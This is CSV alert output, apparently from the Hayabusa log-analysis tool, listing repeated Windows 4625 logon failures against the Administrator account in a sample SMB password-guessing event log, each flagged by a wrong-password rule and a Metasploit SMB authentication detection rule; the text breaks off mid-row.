NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zxJNU05FkPwhcYxj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TWifHaaBiypAGkKi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9VByeO8vHGSOJK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ns12T94itDDRxYxC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8jplFaHgwrWpFY8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ9L626fGZQkNC25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: HfplQ16d7lsObzki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c30ILHx5sYZCMflg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GMsJKiYmbgbr9wF0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2hpQI6z68MVBzoW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDgzJjXBnWDSVjdg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0XU5HdsnM0Lvpvq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjmtkv6JDb4s2WnR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6mBM2WMWlKkQHZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3jo7coI8uS8JCorc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ao6QcPI3nzpNnHi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: WkP8vstCEOH9wnUW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzrhcYEue85zhZ8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ivpdjGaxoZOCTxbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIsZXHE4Swkbytiu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bdT2bVjtEd6KhQWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RT9Tqp0lf0dd6h9C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xwhlrl2ck1o2qTDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxX2762Fa804981t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O55rRqTo9vgwnYoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zo7BzxXZDdykOXoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6YGEMcvYtwNJys39 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0xq8et2LwWSgVgk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43EK0cGlZBhWRd5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UBoGMdTjWVVVvifn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcCrPXp3VLObGU6v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zhZguuPimqAruiTu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o6amdSWFFbueCyp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0wRaNXdhMlIY1HX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J8jqrrwWeKZGypW0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LIavw2zakOP4DqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: qz7gr4vA633waQ01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2TmHz5POLSNJHm2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DcpOxhy2nnLIEGHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gJxfDgfujy5Um2wa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 217VTq8EbYIDeSXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPfE1m0tsJAJnRt9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OQCfGhvBMSq3PIoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XBl6JIRetWEnjaVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXJMNnj4LeBIYARt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3sdn9f4xtvcsaHp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
